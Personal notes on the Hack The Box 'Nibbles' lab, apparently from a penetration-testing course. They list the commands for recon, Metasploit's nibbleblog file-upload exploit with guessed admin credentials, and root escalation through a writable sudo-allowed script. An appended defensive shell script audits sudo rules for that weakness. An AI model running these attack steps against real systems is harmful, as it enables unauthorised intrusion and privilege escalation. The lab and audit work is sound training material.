TCM PEH Hacking Nibbles Notes


HTB Nibbles

Recording strokes to derive methodology

nmap -A -T4 -p- 10.10.10.75
Noted port 22 open
Noted port 80 open
Noted Ubuntu OS


searchsploit apache 2.4
Visited 10.10.10.75:80 in browser
Viewed wappalyzer extension, noted Ubuntu
Viewed source
Noted comment pointing to nibble blog directory
Visited /nibbleblog
Noted more links
Viewed source
searchsploit nibbles
searchsploit nibble
Noted nibbleblog 3 result SQLi
Noted nibbleblog 4.0.3 Arb File Upload
msfconsole
search nibble
use exploit/multi/http/nibbleblog_file_upload
info
Noted that this allows AUTHENTICATED remote attacker to blahblahblah


dirbuster&
http://10.10.10.75:80
go faster
/usr/share/wordlist/dirbuster/medium
/nibbleblog
php
Start
Review tab
Visited /nibbleblog/admin.php
Logged in with Admin:nibbles
Visited Settings
Noted nibbleblog 4.0.3


In msfconsole
options
set password nibbles
set username admin
set rhosts 10.10.10.75
set targeturi nibbleblog
options
exploit
Noted session created
sysinfo
getuid
shell
pwd
cd /home
whoami
cd nibbler
ls -lha
history
cat .bash_history
sudo -l
mkdir personal
cd personal
mkdir stuff
pwd
echo "bash -i" > monitor.sh
chmod +x monitor.sh
sudo monitor.sh
whoami
Noted nibbler, still
sudo /home/nibbler/personal/stuff/monitor.sh
whoami
Noted root
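
The root shell above implies a sudo rule naming a script under nibbler's home directory, a path nibbler could create. A defender-side audit for that condition follows as an added example, not part of the original notes. The sample `sudo -l` output, the function names, `TRUSTED_UID` and the ROOT argument are assumptions, and it expects GNU `stat`.

```shell
#!/bin/sh
# Flag sudo rules whose command, or any parent directory, is owned by an
# untrusted uid or is group/other-writable (hypothetical helper names).
: "${TRUSTED_UID:=0}"   # only this uid may own the command and its parents

# Constructed sample of `sudo -l` output (not captured from the box).
SAMPLE='User nibbler may run the following commands on host:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) /usr/local/bin/backup.sh --daily, /usr/bin/nothere'

# Print the absolute command path of every rule read from stdin.
sudo_cmds() {
  awk '/^[ \t]*\(/ {
    sub(/^[^)]*\)[ \t]*/, "")               # drop the "(runas)" part
    n = split($0, part, /,[ \t]*/)
    for (i = 1; i <= n; i++) {
      sub(/^[A-Z_]+:[ \t]*/, "", part[i])   # drop a tag such as NOPASSWD:
      split(part[i], w, " ")
      if (w[1] ~ /^\//) print w[1]
    }
  }'
}

# check_path ROOT CMD: ROOT is "" for the live system or a mounted image dir.
# Returns 1 when an untrusted user could replace or create CMD.
check_path() (
  cmd=$2; stop=${1%/}; stop=${stop:-/}; p="${1%/}$cmd"; state=OK
  # A missing command is only as safe as its nearest existing parent.
  while [ ! -e "$p" ] && [ "$p" != "$stop" ]; do state=MISSING; p=$(dirname "$p"); done
  while :; do
    set -- $(stat -L -c '%u %a' "$p")       # $1 = owner uid, $2 = octal mode
    if [ "$1" != "$TRUSTED_UID" ] || [ $(( 0$2 & 022 )) -ne 0 ]; then
      echo "RISK $cmd ($state): $p uid=$1 mode=$2"; exit 1
    fi
    [ "$p" = "$stop" ] && break
    p=$(dirname "$p")
  done
  echo "$state $cmd"
)

# audit_sudo ROOT < sudo-l-output: returns 1 if any rule is at risk.
audit_sudo() (
  rc=0
  for c in $(sudo_cmds); do check_path "$1" "$c" || rc=1; done
  exit $rc
)
# Live use, as root:  sudo -l -U nibbler | audit_sudo ""
```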
